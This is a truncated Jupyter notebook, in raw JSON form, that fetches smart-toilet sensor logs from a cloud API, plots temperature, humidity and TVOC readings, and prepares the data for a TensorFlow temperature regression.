KNUey2bafs3fN81pxqn5JcDCE520/bYsqsn+MU39dJKAHFUxJlMAml8yl+AhPJhJgpU+4kjv6OwcIcz1jQTvuStG5jjCJJSM6637Xfp6n/QMql7F20i7DJt1gSSgBPTOzSFb+r9YwEgPrdK3fHxAlyx7l0IpaRtLV2kinmVG0klEilP4mjbTF15k1xJJQAMGgOUPxFhOew3m7eKM0SxWKNSVP2LokgFYPZbdup6LJ3TlS0cgclQ0jO9ntYLZZfpv4jKZ7YWJzX6+3mpxx+6DFIKAE8B/YePIskTiidh8VaHBNhciDxGUdCibGMCe1KnlfYHNVMeyHJeru5kZyNom0xeWEjDnGKnUNJKAE8U/YujUXDiYUdMLdF/dHDuOyWXFiwxSm+TjmjvfcIW5WcsJWsbmZsIpW2FMdGInLhjvE4EkoASCilCrvROB0B1TgWa2RB2bsk+j8GCyWGnERvVmTZu/A3X03gp0yNcncMYYzup9wdObGxIM5tqWXvJJQAnkkopSu2ZuyZWKzFMQEmJxKgcfR/jGVsaFdi+9KnNNNOSBJOELvftZ+2RU58r/GKPKEpoQQQuEdpkF8y/M1ZUu4umnJ35MaCLU5d9k5JHcaQvG1XYttyyn7f42qx1E5IJTkbx+ZVshFOqip7F0dCCYDKMfQ0xZVIOSOLtTiC82RF2bsk+kEGC6WGtLVmRZW9s0mnlTkUQxib+9XJWu2L3Phm4xRZOlhCCWCXhFIaCaXTeVvKHzqSiS85siM8TrF1yjkYba1dSUFhAfBm5lAkUe4umrZFjny38YqbV0goAexyFD2NhNIJuDg6mstuyZUFWzyBYMbQ1tqVVLJFP7LPCQqGUIo2jrZFdpS9S1JcXyihBLBLMDrNZU4/NmMCH3Es1siSsndJBK8YTFvrVFLJFvcn7TOHIonSkdEka8mZbzdOPYcq6n5xCSWAF8IujEfPhIkRQI2jlBE58/3GuS6xTjkH9d7jbDX7DSxKdLUSNCSVDW9xtC1y5vuNV1TMRkIJYJ9TSgnW241dnkek3F005e7InQVbPEEsxtDW2pUQDNF/7HtwgoIBtKU42hbZUvYuSVF9ooQSwL6vngkTYrEWx2KNrCnFlcSpTQYTHOlUQtk786p95lAkUe4unmQtM+AbjnNZUtk7CSWAfRJKaX7K6cdm6G3pDyCScmHMge84Tkl3vXAcgiPtZptwCYEe5e72GXtIJTEbx+YF5sCcKV4xsRsJJYB9Ekppirp88JRC4OOynL94sEfl7pgJC7Z4ku2Moa21m/MJQKcb9ykZzBDaUhxjDdlzsjtJMcl2CSWAfRJKTIXFWhyLNWZB2bskdkczWAiO/OoJNprzCUD9xj5zKJKE/uHaU4uifTEXvuU4F+vtpoi5hoQSwL7fPBMmQuAjjgkuc6L0UJyi6pRzFMaOdrObf4QguFPf+4w5pLI+iXMXNi/AHJgzxZNQAiiRsg/JbjL7vVlQ7i7ao8tumRnfczynOBksjB2PnmCjObYtQfB9yt0xhLE3jvkcs6HsXZJX6+1m9veMSygBwDRZrMWxWGNWlL1LIkDMWMaQZnMse2dete/91H4Q0xb6hSuvKYrxhbnxTce5KGGNIqEE0MyOVc5NoDSOiS1zpARRnMtS6pRzNNpau9m0rbBTWBB8nzkUqYy5cZS7Y46MGfEklAAKpfwDZxMCpMrd9VPujrnyXccT3GKw1WL5qS775Qk2mtOJHv3EvvtwIhZSOOkX51MOPxJSKHuX5HbuZe8klABgegQ+4gi6M0vK3iXRXzKWsaTZnMre6Sf2OZ1HknC/q5N+cYwrzJVvO96s5x4SSgCMde0JHpzARxy7/5gzwb44F8reMZK21m4ubet2Ar9hagQFSeV0Uhyn/5gzY0e8t7n80CEklABgQkJg9MI7iWJCy5z5vuMJcjHYarH8ouxdq+wTShLOjQS8GUJbimOTArOl7F2SOZ303iOhBADTYrEWx2W3zJqyd0lmX6eco3vvETe6nkHbMq/a53snSSh3537XODYEMXe+8XiznYNIKAE0++K5cCYCH3FMZCmBXa7x9J2MYUxpl3vb0jfs872TykngOE7/UQJjSLzZ9p0SSgDNnHzg5NbbzRvl7qKZyFIC33k8QWMGcyKwU7ZtK5yqMK/a5YQ3Qxhj49gIxOwpe5dktmXvJJQAYDos1uIIhlAEQe4kt3OuU85JCAQ2y7mkpFMV+2xUIMl6u7lR7i6a9kUpfOvx3ubyQ1NIKAHABIRgza13EcUElpIIcseTlGcMba1drm3rZgK/YWrMoUglMRvnQbk7CmIsiTfL9YmEEgBMg0BoPBNYSuJ7jyfoxWBKuHTKbo4STixeTeCnTIkT3gxhjRLHfI1imDMluQwleGdFQgmg2ew6fCbPYi3OvWAIJVH2Lsls65RzMgKCzXI8QW1etc/3TZL1dvPKPWTRnHKlNMaUeLPb9CahBNAs11rxZEi5uyQWa5TIdx/PKSXGEBxpEQLLOVHubtfjarE0lpBKYjZOXe7uSw4/FA7InCmehBIAcHAWa/FMXCmR7z6ehBKDKeHSKZu5io06jYwjDGGNEkf7ojjmTEkuMtyY00lCCQDO7613EOXeZbeUSNm7JLOsU85JOcXRLKdAiNNJ+wS8SaLcXRLjBqUytsSTUAIADsOl0Uks1iiZ7z+eU0oMtlos6+DIoye4J6fdtU5V7HoM3zWkMJbGUe6Okhlb4kkoARTA7mZORdAjngkrJfP9x9OvMpb21iyXkz/6gF2+Z5IoG5lE+6JYyt4lqTfmzCZRL6EE0Mzx/njKMI1j918c5e4omrJ3SS7nVqeckxMgbDb5dhVKXprH7/I9k8oYGu9TLj8UjsQYE282fauEEgBj/eYJDqPcXRITVVD2LoVgGIOF8mAPnuCeHO4os1Fn14NydwxgDI2jnCRYp6e4DSdAsyehBPCD9XbjIl9OxWItnokqaAcp9K+Mpb01m3rCxjx+l++YJMrdJdG+KJ6yd8lmsUaRUAKA83nr2Udx2S0oe5fqQtk7RnIisNlkEzZOfjfyHZPK2BlPQgmeaAvxZnGSWkIJYN/US3kwA6FkzKV3GcUEFZ4JDsYTFGOwsJFB2bt9VyFxM0Xa/C4bchhC2cg4yt3BM20h3vWE51HRJJQA9s2ipukJuYh0GIu1eALo8MyCLd7rudQp52yMP82mmrhR7m6X8YIkIch57alF0b4gUPYuWfYbYCSUAPZZjHIKdtHGsbsWXghl75yaiKevZQwJpWZTbVfufdnl+yWVMTOehBLs0ibiZb+5WEIJYF/2x0+ZNuXukpiYwj7tIp7gGIO5t6zV9dRO/7kzbY8NOQyhgkIk5e5gjzYRb8rlg6NIKAH/f3t3kxzHcaYBuGfCe2h23SvQ296AOgHpEwA+gaATGD6BqBMYOoHNE1g4gckT2Nj0doRV926EG0wUkSAA4i+/rJ/OqnqeiAl7ZkJUs7qz8ufLfJPHLPTHmKzGmazls7sWHtMu8h2LvaMl7e1ptRVwFJQeOq/pw1C/tLh55KvKItoLviH2LuxsZJ/3AQUlgHs2u624u7jfx/aBK2DRI8+13bXwWGoXYu/yKeLThh23T6ttzGwM/5DfLVHmJ/m0L3iatpFv1O9cBSWAh956HmEKSgEpksUpuDwGpPA87SOfghLFUuydHbePVbMQIkr4kcv0u4UIfWU+YzB4mraR7zCNX0ZJQQngIQWlICdIwuz+y2dACs8Tw5Vv9Dnl7J3+6LGDik72O530kP6BkLSoKe4uz0WK9gK+IfYubLSFfAUlgIcUlOibglKea5fdwvPE3oV599KG/uhptbQr7fshv1einE7Kp33By7SRfKMdvygoASTp0m47s2I+j+nD7luKuzuY91PIZiAKr9NO8o364lv2y47bZ+19ISSN39/t+3NURNwdJRRl8xl7wcu0kXyHaY1odBSUAO6Iy6BvJmv5DEThdWKN8o06p5wq6JceO6wgTtL4/aHzmj4M9XMHWYi4O3iFTThhCkoAI2dCGuf+pBgFpTzi7iCD2LswkT4UWy9XTQH32hN8ZN9jG2Orh4yfiNI35vs0lg8Ke6YvyqegBDByJqRxdmhl2uy2p+LuspmsQT4Ttnz6edrS3h7bd7uyIeyO0xOU0Dfm0wdAHm0l38EYY+8UlABuFvvfOOpfxMJ/PpO1fAagkE/sXb4mnsviM23onx57l+4xGpyorkf8PglJfaI2lMf9ZJApbW649Lyyje6kqIISwA2L/WXsgsyQFlqOq/+g9bAgApnE3oWJ9qFYimMVe/fYvsbRCsQPGT8RpU/MZwMPxGgz+Y73tTmnlIISwA0T0gJpIZPXKVjmE9cCcRYR83kf05YFksf2NY7Wnu8YP1FCG8pnrAUx2kzMqN7HCkrA7Dk9UswR5nwma/kMPCHOAne+UeaUUxXt7bHB21Qav78b+t9bMeMnQlJf6H7XPOLuICi1GWtG+RSUAEbGwlIZg+oMCpZhFkQgSOxdmH6fYtrbkw7SfUZDki5w53q9XCl0EqUvzKd9QRltJ99xutt9FBSUABaLM8+giLi7PCZr+cS1QDnF2HwnY8sppzra22ND38VifHXH75ES2lA+bQzKaDsxo3kvKygBs5Z2ABzN/TkUUlDKo2CZz4ATytkBmO/AQhotnXuAjwx9YsgJpTvGT4SIuwu5EncHZcTehQ29OaeYghIwdxb7yykovULBMuzTyD4vVEMMV5iCEsUskDzpaKiolvTvORzi3zUCTdydghJRo1m0rID2Be3Y9JZvsLFUWwpKwNwZTJe5tlMriwXLfC67hfYseuQ7FntHSxZIHhvq1JDx1R3vfULc7xrmXQ/t6KdiRrFGqaAEzNZmtz111L+Y00l5FCzzmaxBe9pRjEVp2rBA8thQbUrc3R2/Q6L0ffmu0glwoJBT3WEKSgCVE3dXTjTZK8TdhVkQgZbE3oUZB1AsLZB89gQfGOrUg9MVN67E3VFAQSmf9gXdsOkt3+Fmt31b+4dUUAJmabPbvrfY34qdWq8zWcsn7g66Y/Ej32hyyqmWBZJvpMv++/zznU66431PiLi7MO946Ib+Kqb6U0oKSsBcffDNt+KE0uvsfM9nsgbd0Z5iFP9pwwLJY30XfLTZO973RGk/+cTdQUfE3oVV/65WUAJmJ+1sfOebL9YMrn8f6WcfRDqifDiDv2pXLMhBR8TehbnrjmJpPHThCT7Q9yKIE0o3LHZTQp+Xz/wEumUTRL7D2k9kKygBc+R0UjtOJ73OZC2fuDvonkWQfEdjyCmnatrbQ4d9RUmmuC6R1Tf87ghJ7dKmynzmvNAt/VZM1WtKCkrArDid1AmD69eJk8jn9wTdswMwxiYAiq2Xq6a9XXuCD/Q1DjK+uuM9T5T2k+96vVxZ/IYOib0Lq/qdraAEzI3JV3sKAC8QdxemTULHxN6FWWSjLQuPD/XVpsTd3RB3RwmbJ/J5p0M/zP3zHWx222rnKApKwGxsdtszC/2tXYkne5XJWj4LItAfiyH5DsXe0ZL29tC7FE/XNQWlG+c1fAjGI8XdiYvM550O/dC2YhSUAPYpTWrdndSe00mvs9M9nwEl9McOwJizMX1Y6pKikcTePdRp8ccJ8AeMn4gyP8kn7g56IvYu7IeeNui0pqAEzEWzk+/At92awfUL0pFkix35LHhDT8TehVlsoy1jpIe6blNOJ924lBZAAQkK+bzLoV/WAGKqnKMoKAGTt9ltmwnoD77pTjih9DILkvnE3UH/LIrkqzqnnFEQQ/ZQ1wUgBaUbFuIISaf7xN3lM3aCfmljMQpKAENLx0NNvLrR7Ij8fQp/kR5ZjMxnIAn90//FeIdTzKnAR7q+m+y4wz9rzIyfiHI6KUDcHfRL7F3YcY2xdwpKwNSdiyDrjIXJF6Sd7WIV85msQc8scIed1JpTzmjo2x7q5FRRShtA3B1lbJbIdzGWDwojZ20pprqNAQpKwGSlBX5Rd90Rd/cyk7V8zWW3fk8wDAvc+Q68y2nJAslDXbUnBaUbYhUJSacEba7MZ8wEw9DWYhSUAIaw2W3fmNR3yn03r7MImc8AEoajL4zxLqdYGiuJcbnzrqNTf9rlDeMnosTdxWhjMACxd2FHaY2zGgpKwOSkieuv4sc6ZXD9gs1ue+r3FuL3BAMRexdWZU45o6KI+1Cr00WpPR718LnG5sJdphRQjM2njcGwjJdiqnqfKygBU3Ru4tk5nf3LTNbyXbvsFganzcV4p9OG9vZQ2/Yk7u6G3xUh6e4xcXf5tDEYljYXc1bTh1FQAiZls9ueuTepc+LuXpB2zh5X+wHrY+AIw7MpIEZEEMXEuDyioNQN4yei9GUx2hgMyHgp7DDdi1cFBSVgMlLs2N98o50zuH6Znewxfk8wMLF3Ye9qyylndM59ZV8dtFwAMc4SxUUZbSefNgb7YdNbTDUbBRSUgElIE1UMfqjUAAAVRElEQVST937o5F9mspZP3B3sj7YX491OG9rbQ0XtKRV2RXb5PRG02W1P3O8a8mlEnxWmRP8WU838REEJGL1UTPpk0NwLcXcvEHcXZrIG+2NzQIyoIIqlne4XnuBXpQsg4u5uNuN4fxNlU0SMRW3YA7F3YYfpfry9U1ACRk0xqXdOfb3MZC3GZA32ROxd2JHYO1rS5905SptwohSU/I4oY46S7zItagP7YdNETBWb3hSUgNFSTBqESezLzmr+cBXye4L90gZjvONpo2lv157gVyUL3BbFvbcJSvcKmx/ns5gN+6Wfi6libKSgBIySYtIgLuzWel7auX5U6+erkMtuYf8smsRYzKZY6vMsktwJnTZKY/25j/PdPUkJfVeMNgZ7JPYu7CDdk7dXCkrA6CgmDcbC48tM1mJM1mDPxN6FHaYxB5TS992JjpvE3fn9EOR+1zBxd1AHa08xCkoAEekCOsWk/l3ZEfkqF7bH+D1BHbTFGO96iqWxlNi7GwfBAq2Ckvc1cTa8xVjEhjro72JOCu+m7IyCEjAaKQ/6X4pJgzC4foG4uzBxd1AP7/cYBSXaskhyJ7LYPfeCks1dlFBQitHGoAJi78IO9v2+V1ACRmGz254vFou/+7YGY8HxZSZrMSZrUAmxd2FV5JQzasZUd7LakvuTvjB2IkTcXdiVuDuoivFSjIISwHOagfFmt20i7v7iIQ3mo8H1q84q/3y1+TT3BwCVsVAZo6BEsfVy9UkR96ujdMr7NdqchTXitJsYYyGoizYZc7zP2DsFJaBaaXdis5P6nW9pUCawL0i/y8NqP2B9XHYL9fGej7FIR1sWSe7kRNmJu7s5TQoRNrzFGAtBRcTeFdnbHEVBCajSZrdtBsT/tnA/uM9pJy3Pc59GjMkaVCYtVF77XrIdpHscoZS+8E7O4sfcN5MpQBLiftcwRVuok/FSzN42EigoAVVpBsMp4u5vvpm9OJ/h3znKTvUYiyJQJ20zxrufYu4ue+DF00eb3Xbup5MWFtQooI+KMQaCOmmbMblRwp1TUAKqkS69FnG3P81OLR34C8TdhYm7g3p538fsNaecSbBp58bBK0WjuReUnJyghFO0MYq2UCGxd0X2sqFAQQnYu3unkv7ZTDJ9I3vzYaZ/7wiTtRiTNahU2kAg9i7GDnDaUMS981JbmntBSeGREHF3YYq2UDdrCDF7WaNSUAL2arPbfnAqqQrNwFrH/TqLiTEWz6Bu2miMPoBidt0+8GTRKJ0CnPucwHuZKH1TjPuCoW76wZijlKQzKAUlYC+aqIvNbttMrH9yKqkKTie9IkUyirvLJ+4O6mfCFnO8r5xyJsPmnRvPZf7P/XSSsRMl9nYp+0gZ+0DFbMApMvgpJQUlYFBN5TzF2/3L4nw1nE7KY/dfjN1/UDmxd0X0BbRhvHXnqeLR3AtKfh+EuN817NqdwTAK+sOYwecnCkrAINI9SU2n8G9RFtVxOimPRcQYg0AYBwsrMe7So9h6ufp9sVhceIJfPDWumntByfuYKH1SjDYG46CtxhwOHXunoAT06l4h6X8Xi8UPnnZ1nE7KkOLuRDPmc9ktjIcJW8xzUV2QS5u78aB4lO5POtrj59k3cXeUsOEtxvsXRkDsXZFB408VlIBepDuSflVIqp5dbXlM1mJM1mAkxN4V0XfShj7yxkEzX7j3v8/9dNJ5BZ+BERF3FybuDsbFxueYQdesFJSATm1229N7dyQde7pV+7xertxzk0dBKcbgD8bFAkuMghLFUuzdR0/wi/vjq7kXlLyHidIXxWhjMC7WqmIOUrLOIBSUgNZSrN2HzW7bHEv9uzuSRmPQI7Fj1RRJxd2FiLuD8bHIEjN4TjmTo83dUFC6cZEKjRBhw1uM9y6MSFpTuPKdhSgoAXVrcs7vnUZqYu1+cuR+VD5a9M9mshZjsgYjI/auiJ3hFNPmvjpMG9Pmfn+SsRMhaRe6uXeM0w4wPvrHGAUloE7N4HWz2zZxVk4jjde100l50gKH6MYYgz4YJ203xmYD2tLmbpyIu/NbIEwfFOMUIIyTKP2Yg5Sw0zsFJeBF6STSlyLSZrdtBmH/XCwWP4gAG7UPBtTZTNZirt3LBaNlQTPmcMiccibJIsmN9+LujMsJ0//EGOPACIm9KzJI/6CgBDzS3Auw2W3PUpzd/ykiTcrlerk6n/tDCDBZizFZg5ESwVVEH0GxtAHDIsnNSfA5F5SMnQhJmxnMy2O0Mxgv7TfmOCXt9OoPI3kYQI/SxdJv02TOAHXa3PmQSdxdEYM9GLdf0wYS8igo0VbT5v7iKc72/qTmZLeTakTpe2KcAoRx+4exUthJ3yfhFZRgZtIi+W3x6PY/FZDm4Zd0ZJg8Jmsx1+mEAzBeCkoxTU75iXcfLVgkmTfvDkqYo8RoZzBizRrWZrdtTnQf+h6znSooAcXSyaM39wpHb7yEZ6vpgD/M/SEEnY3q0+6fyRqMXFMY2ey21zaahJx6/1HKIsnseXcQki5b10fHaGcwfk50x7zb7LZv1svVb339CxSUYMTunTb69j8VjvjWqaP++ZrOd8bxK6VM1mAanFKK+ZJTro+lhWYH6U8e4Ow42U0Jp5NiPuufYRKc6I5r+ove7k9XUII9ulcQesqb9D+3bgtHi/Tf7Uwi1y/p4mfymazFWBSB6VBQius9p5xJU1CaJ+MmQtzvWkQ7gwlworvIqYLSfvy02W0N7IGxE3VX5nSMH3qPFCxhIsTeFVFQolgTR7LZbS+djJ4dC91E2fAWp53BdIi9iznqM/buv3v84ADs34lj/jHi7oqYrMG0aNMxx2nnOJRSkJyXKye7KaCgFHPZ5/0hwOCMleJ6uxdcQQlgun5ujgb7fsNM1uIsisC0aNNxTrbShjY3L75vQsTdFbH4DBOS1raufKchva1tKSgBTFNzAamouzK97eKYqAun4GBa0s75a19riIISxdIu+gtPcDYsdBNlw1ucwi1Mj3Ydc7jZbZ+7t78VBSWA6bk26SiTOlsXPcYY1ME0adsxRykyFUppc/NwJUGAAja8xYi7g2myISOul01vCkoA0+PepHJ2mMdZAINp0rbjbOagDW1uHnzPhLjftYhFZ5ggsXdFFJQAeFVzb9Inj6mYxcAYcXcwUWLvithBTrHUn4q9mz4L3USZn8SZD8N02ZgRc7DZbTvvRxSUAKbjwr1J5cTdFTGYg2nTxmN6yylnNhQbpk3cHSUkKMRoZzBtxkpxCkoAPOnSZKM1zy/O7j+YNgWlOH0JxZwMnLzzuT8AYsTdFTF2gQkTe1dEQQmAR5qFh1PRY62Jk4hx2S1MnMXtIvoS2rIYOl2+W6L0KXFOL8D06U9jmti7Tje9KSgBjN97x/rbSZmy4u5iTNZgHkzYYprYu/dj+sBUR5ubJhtxKOFuvhhxdzAP1iLiOt2goKAEMG4/GjR3wu6/OAteMA/aepzYO4qlk4GiXKbH4hch7nctYswCMyD2rsjxZrf9rqs/TEEJYLx+Xi9XJqfdUFCKscsWZkLsXRF9Cm1ZFJ0e3ylRNifEmRvDfOhX4zqboygoAYzTx/Vy9cF3116KuzsY+99jYCZrMC8mbDEHqW+BUvrZabERhxL6kRhxdzAvxkpxCkoAM9YUk+xY647JWpzFZZgXbT5O30IxUS6Tcz73B0CMuLsin0b4mYFCxkpFmti7N138QQpKAOPyWTGpcxb9Yq7ssoV5EXtX5Icuc8qZJYXc6fBdEmW+F6edwfxo93GdrH8pKAGMx6XiR7c2u+2puLswgzaYJ20/Tp9NG061TMPFern6fe4PgTD9R8x12vwCzIvYu7hONiwoKAGMQ1NMem9C2jmTtTiDNpgnCzVx+hiKpdPAl57g6Hl3EpLu4BN3F6OdwQyJvSty1EXsnYISQP0Uk3qQooiOJ/cX65fLbmGmxN4VORZ7R0s2cYyfhW6ibEaI085gvrT/uNanlBSUAOqmmNQfk7U4gzWYN++AOPdg0IY2N27i7ihhjhIj7g7mzeabOAUlgAm7UEzqlclanMEazJsFmzgFJYql2LvPnuBoeWcSkuLu3O8ao53BjIm9K3K42W3ftvkDFJQA6vRxvVydKCb1Q9xdEXF3MHNi74p0klPOrNnMMU7NqQnfHVE2vMUpKAHeA3GtNr0pKAHUpykm2dHcL5O1OIM0YOFdUESfQxva3Dj53iihv4j7NLYPDHTOBo64Vv2NghJAXf6qmDSIsxn8HbtmsgYsLJIW0a9TLJ1Wv/AER8e7kpDNbnsq7i7MPWWA2LsyhylmtYiCEkAdmgihH9fL1bnvo18peuhoyn/HHrjsFvhC7F2Ro7Y55cyePnhcjJso4XRSnHYG3PI+iFNQAhixZmHuvZz1wZisxRmcAfd5J8Q5pUSxNEZUyB0P70hC3O9aTFsDbllPi1NQAhipy8Vi8SYd0WUYFvXiTNaA+7wT4mxmoC3tbjx8V0TpI+LE3QFfib0rclAae6egBLA/H9PJJAPhgYi7KyK2BXhA7F2RQ7F3tKQvHocr4yYKKCjFaWfAt7wX4oo2XCsoAezHX9fL1ali0uCcToozKAOe4t0Qdza2D0w9FHJHw7uREHF3xbQ14Fti7+KOUz8UoqAEMKzmCO736+Xq3HPfCwWlOJM14CneDXF2oNOWhZL6+Y6I0jfEfbYxE/iW2Lti4X5IQQlgOBeLxeKt+5L2I0UNHc7x796G2BbgKd4NRYpzyiFRrKjblXE+BZxejTMGAZ7j/RCnoARQoesUcXdiJ9VeOZ0UdzG2DwwMyjsiTkGJYnbeVs8iFiHudy2mrQHPsfkmLhx7p6AE0K/LdCpJxN3+WcSLM1kDXuIdEXdSklMO92h39bKIRZT5Sdzlern6bWwfGhiGzTfFQhuwFZQA+vPzerl6a8C7f+Luilm0Al7iHRF3YAGRlhQt6iTujhISFOK8A4HXmKPEKSgB7NnnxWLx/Xq5+uCLqIbJWtyFiEbgJekdIfYuTkGJYqlocekJVkcaASHi7opZKAZeo/Acd5T6pSwKSgDdub0r6b0ditVRUIozWQNyeFfEhXPK4RsWSurjXUiUzQVx4u6AV4m9K5bdLykoAXTjwl1JddrsticpYogYCyNADu+KMhYSaUO7q4tFbkqceWphiulALmOluOx+SUEJoJ1m18Of18vViYlktSzaxYm7A7KIvStmIZFiacwp9q4eFrkJcb9rsU8j/dzA8PTNcYepf3qVghJAuZ/TqSQ7H+qmoBRnsgZE6AfjQjnl8ASn4uvhHUiUOO64K7HyQC6xd8Wy+icFJYC4Zif2H9fL1QenOOom7q6YhREgwjujjA0PtKHd1UHcHSW8/+O884Ao7424rP5JQQkg3+fFYvEn8XajYrIWZ2EECBF7V8wOdYppd9VwUowQcXfFxFcBUQpKcU3s3fvX/ikFJYDXNcdkf1wvV+/Xy5UosJHY7LbfKSgVMVkDSpiwxYm9oy3tbv98B0TZTBAn7g4IS+t3155c2Kv9lIISwPNuC0lv1suVRfbxEXdXxsIIUMK7o8zZGD801fjVQsleXYi/poANb3HGGEAp74+4V/spBSWAxxSSpsFkLU7cHVBE/FYxfRXFUruzULI/nj0h6X5XcXdx5uRAKX113EHqr56loARwRyFpIlLc3fHcn0MBv3ugDRO2uMN0nwaU0u72x7MnyiaCOHF3QLH1cuU0dxkFJYBXXCokTY7JWhkLI0Ab3iFl3KdBMQsleyPujhLmKHHuMAbaMkeJ+yFt1H6SghIwZ000z5/Wy9VbhaTJMVmLuxJ3B7Qh9q6YghJtWSgZnmdOSIoPcr9rnLYGtOU9UubZdTUFJWBumh2cvywWiz+ul6uT9XJlx9PEiLsrZpAFdMG7JO7VnHJ4xbkHNKhrm9Eo4D0fd51OYQIUc5q7mIISMHtfYu0Wi0UTa3fmJMak2eldxsII0AULP2UsNFIs3S9y5QkOxnuOEt7zcdoa0BXvk7jj52LvFJSAKbs9jfT9baydrPNZUFCKc9kt0Amxd8UsNNKWhZLheNaEbHbbU3F3RbQ1oCveJ2WenKMoKAFT9HGxWPx5vVx9l04jWSific1u+2axWBzN/TkUMLgCuuSdEneQFhyhlJPGwxDBRQmbBuK0NaAzYu+KnT31DyooAVNxkSLt/me9XJ0afM6WyVoZi1BAl/TBZfRhFEsbqC49wd55vxHiftdi2hrQNe+VuKO0cfsBBSVgrK6/KSKdiLRD3F0RcXdAp8TeFXs2pxwy2SDSP4tRRNksUEZbA7rmvVLmUT+moASMydU3cXaKSHwl7q6YQRXQB++WMhYeaUO769eVFAQKeK+X+TTGDw3US+xdsUcbtxWUgNo1O5z/ulgsvl8vV2/E2fECp5PKmKwBfdBXl9GXUWy9XP0m9q5X3muEiLsrdmHTKNATfXlcE3v39v4/paAE1ObzYrH4ebFY/Gm9XP1XOoV0LpKLDBbh4lx2C/RC7F2xd0/llEOA2Lv+eLZEOZ1UxvwE6Iv3S5kH621/GNEHB6bnOp2OaIpFn9bLlZMSFEm7JQ49vTCDKaBPv9qZXaRZgDwf4eemDk3R42++i865c5ISZ55aEXMUoBfNhtrNbtusRR54wiEn9/s0J5SAITWnj35ZLBY/LhaLP967B+mDYhItOZ1UxmQN6JN3TBl9GsWcDuyN9xkh7nctJu4O6Js+Pe7wfuydE0pAH65vTx0tFosmy/0/dvTRM3ESceLugF41C0Kb3fbCKaWwJqf8TboPB0o4Hdg9cXdEmZ+UMT8B+ta8Z37wlMPObje+KSgBbdwWjv5zWzhKxSM7ihiMuLtiJmvAECxslzkTlUQLTbv7uwfYGXF3lHDatIw5CtArsXfFvm6UUFACXnOVikW/3Ssa/S6ijoqYrJUxWQOGYGG7zImCEqXS6cCPdt92xp1mhIi7K/bZ5lRgIE4pxR1sdtvm2pJfFZSAz+kJfCkU3S8eiVphJBSUCoi7A4Yg9q7Yl5xypyJowUJJd4yZiBJ3V0ZbA4ZinFSm6d8UlGCCbmPobt2eJPr93v9dsYhJaHZHOKZcxGXdwJDE3pU5dUqJUuJcOnNp3kQB7+4yCkrAIIyTip1sdtvvFJSgPp+f+ES3p4du3Z4i+vr/dzScmbL7r4zJGjAksXdlxN7Rlt237f1j7H8BhuV+12KKt8DQjJPimgLcyR/SovRTC9gwV98Wb0p8W/B5xB1E0Inv9GFFFJSAwaTYu18Wi8VbTz1G7B0tNcWQNx5iK8ZMRL01PymieAsMzTipxGLx5v8Bg5kgHXdNxwMAAAAASUVORK5CYII=\" width=\"200\"/>\n</div>", "_____no_output_____" ], [ "**API Validation & Prediction** <br>\nThis document will be validate the gathered API Data and will is able to being used for predictions and analyses\n\n***Temperature Prediction*** <br>\nTo start off Machine Learning is being used to predict the temperature of the certain amount of days in the toilet. By using basic regression model (linear) its possible to predict the temperature based on the API data thats being generated by the device.", "_____no_output_____" ], [ "# Imports <br>\nIn the first stage of the notebook all imports should be made for running the code later on in the notebook", "_____no_output_____" ] ], [ [ "import urllib.request\nimport json\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.datasets import fashion_mnist\nimport datetime\n\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\nprint(tf.__version__)\n\n# Disable copy warn\npd.options.mode.chained_assignment = None # default='warn'", "_____no_output_____" ] ], [ [ "# Fetching API <br>\nFirst gather the API Data from the URL. After that print the first elements of the fetched data", "_____no_output_____" ] ], [ [ "with urllib.request.urlopen(\"https://us-central1-bava-solutions.cloudfunctions.net/GetLogsOfADevice/.F0:08:D1:D8:07:D4\") as url:\n data = json.loads(url.read().decode())", "_____no_output_____" ], [ "df = pd.DataFrame(data)\ndf.tail()\n# df['timestamp'][0]", "_____no_output_____" ] ], [ [ "# Plotting the data", "_____no_output_____" ] ], [ [ "df.plot(x='timestamp', y='tvoc_co2')", "_____no_output_____" ], [ "# Reading TVOC\ndf = pd.DataFrame(data)\ndf.plot(x='timestamp', y='tvoc_ppm')", "_____no_output_____" ], [ "# Reading humidty\ndf.plot(x='timestamp', y='hum')", "_____no_output_____" ], [ "# Reading temperature\ndf.plot(x='timestamp', y='temp')", "_____no_output_____" ] ], [ [ "# The numbers mason <br>\nThe numbers mason what do they mean?", "_____no_output_____" ] ], [ [ "# Getting all triggers by occupation\ntriggerd_by_occupation = df[df['occupied']==1]\ntriggerd_by_occupation.count()['occupied']", "_____no_output_____" ], [ "# Getting all triggers by timer\ntriggerd_by_timer = df[df['occupied']==0]\ntriggerd_by_timer.count()['occupied']", "_____no_output_____" ] ], [ [ "# Predictions <br>\n**Predictions based on Machine learning data**<br> \nFirst prediction is determining what the temperature might be in a few days.\n", "_____no_output_____" ] ], [ [ "# Tensorflow\nnp.set_printoptions(precision=3, suppress=True)", "_____no_output_____" ] ], [ [ "#Clean the data. Drop any columns with missing values or null values.\n\ndropping timestamp and mac because they are categorical and irrelevant.\n\ndropping BatteryLevel and LiquidLevel because they all have same data.", "_____no_output_____" ] ], [ [ "dataset = df.copy()\ndataset.isna().sum()\n\ndataset.dropna()\ncleaned_dataset = dataset.drop(['mac', 'batteryLevel', 'liquidLevel', 'occupied'], axis=1)\n\ntemp = cleaned_dataset\n\nfor i in range(len(cleaned_dataset['timestamp'])):\n cleaned_dataset['timestamp'][i] = datetime.datetime.utcfromtimestamp((cleaned_dataset['timestamp'][i]['_seconds']) ).strftime('%Y-%m-%d')\n\ncleaned_dataset.index = pd.to_datetime(cleaned_dataset['timestamp'])\ncleaned_dataset = cleaned_dataset[cleaned_dataset['tvoc_ppm'] != 0]\ncleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)\ncleaned_dataset\n", "_____no_output_____" ] ], [ [ "#Splitting for regression using Tensorflow", "_____no_output_____" ] ], [ [ "\ntrain_data = cleaned_dataset.sample(frac=0.5, random_state=0)\n\ntest_data = cleaned_dataset.sample(frac=0.2, random_state=0)\n\n# test_data\n\n# cleaned_dataset = cleaned_dataset.drop(['timestamp'], axis=1)\n\n# train_data, test_data = np.split(cleaned_dataset, [int(.3 *len(data))])\n\ntrain_data\nprint(len(test_data), len(train_data), len(cleaned_dataset))\n\n# Y = cleaned_dataset['temp']\n# x = cleaned_dataset.loc[:, cleaned_dataset.columns != 'temp']", "12 30 61\n" ] ], [ [ "#Split attributes and labels apart", "_____no_output_____" ] ], [ [ "train_features = cleaned_dataset.copy()\ntest_features = cleaned_dataset.copy()\n\ntrain_labels = 